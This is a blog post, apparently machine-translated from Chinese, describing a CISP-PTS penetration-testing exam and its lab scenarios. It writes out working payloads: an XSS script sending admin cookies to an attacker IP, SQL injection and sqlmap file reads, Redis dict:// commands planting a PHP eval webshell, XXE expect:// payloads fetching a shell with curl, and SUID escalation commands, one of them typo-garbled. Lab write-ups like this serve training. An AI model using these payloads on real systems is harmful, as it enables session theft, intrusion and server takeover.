banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
HomeArchives图文

cisp-pts exam records

#考证41
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The exam for pts is conducted in less than half a month, and those with a solid foundation in problem-solving can pass easily, as many questions are similar to training materials. However, some questions, like the last one involving Nacos, posed challenges due to a lack of experience with it. **Exam Questions Encountered:** 1. **Scenario 1: XSS + SQL Injection + File Reading** - XSS was exploited by using Python to set up a web service and inserting a payload to obtain the admin's cookie. - SQL injection was performed using crafted URLs or tools like sqlmap to read files. - File reading was done by accessing specific URLs. 2. **Scenario 2: SSRF + Redis Getshell** - SSRF was utilized by scanning directories and downloading a backup file to find a web port. - Redis getshell involved writing a web shell and executing commands to manipulate Redis settings and save a PHP file. 3. **Scenario 3: XXE Vulnerability** - An XXE vulnerability was exploited to write a web shell using the expect command, allowing for command execution and privilege escalation. Overall, the exam required a combination of web security techniques and vulnerabilities to solve various challenges.

The exam for pts took less than half a month from registration to the test. If you have a foundation in practicing questions, it's quite easy to pass, because many questions are basically the same as the training materials. However, there are some questions that the training institutions also don't know. For example, in this exam, the last major question had the service inside as nacos, and nacos has no exp. I tried common weak passwords, but couldn't get in, so I didn't attempt it. Most of the questions only had 2 keys (20 points), and if you ensured that all the previous keys were obtained, you would already have 80 points. As long as you have more than 70 points, you pass.

Let me talk about the questions I encountered in the exam.

Scenario 1#

xss+sqli+file reading, quite simple

For xss, you need to use Python to start a web service on the attacking machine, then insert the payload. Here, it utilizes a stored XSS vulnerability to write the payload and obtain the administrator's cookie.

<script>document.write('<img src="http://ip:1234/?cookie='+document.cookie+'" />')</script>

Obtained the administrator's cookie.

Through the browser right-click Page - Inspect, select Application, find Storage - Cookies, and replace it with the administrator's cookie.

Pasted image 20241028150907

sqli payload

http://ip:3603/admin/edit.php?id=12312/**/UniOn/**/SeLEct/**/1,2,load_file("/var/key2"),4#

Or run sqlmap

http://IP:3603/admin/edit.php?id=11 (GET)  
# sqlmap.py -u http://10.52.0.29:3603/admin/edit.php?id=11 --cookie=PHPSESSID=732ece3c4dcdba588d48593d689bf927 --dbms mysql --file-read /var/key2

Arbitrary file reading

http://IP:3603/admin/setting.php?page=/tmp/key3

Scenario 2#

ssrf+redis getshell

ssrf: Directory scan robots.txt, download backup.zip, unzip to get a txt file, which will provide a web port. Input http://localhost:1234 in the search box provided by the question to obtain the first key.

redis getshell:

Write webshell

dict://localhost:6379/flushall
dict://localhost:6379/set:1:'<?php eval($_POST[1]);?>'
dict://localhost:6379/config:set:dir:/var/www/html/app1
dict://localhost:6379/config:set:dbfilename:a.php
dict://localhost:6379/save

Write private key

Pasted image 20241028151536

Obtained the second key, the third key is in the task schedule.

Scenario 3#

An xxe vulnerability

Write webshell using expect, expect can execute commands, by starting a web service on the attacking machine and using curl to request.

Execute command

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://id">]><p>&b;</p>

Write shell

<?xml version="1.0"?><!DOCTYPE a[<!ENTITY b SYSTEM "expect://curl$IFS$9-O$IFS$9'192.168.80.48:8088/shell.php'">]><p>&b;</p>

Privilege escalation

find / -perm -u=s -type f 2>/dev/null
find 1 -exec 1s /root \;
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.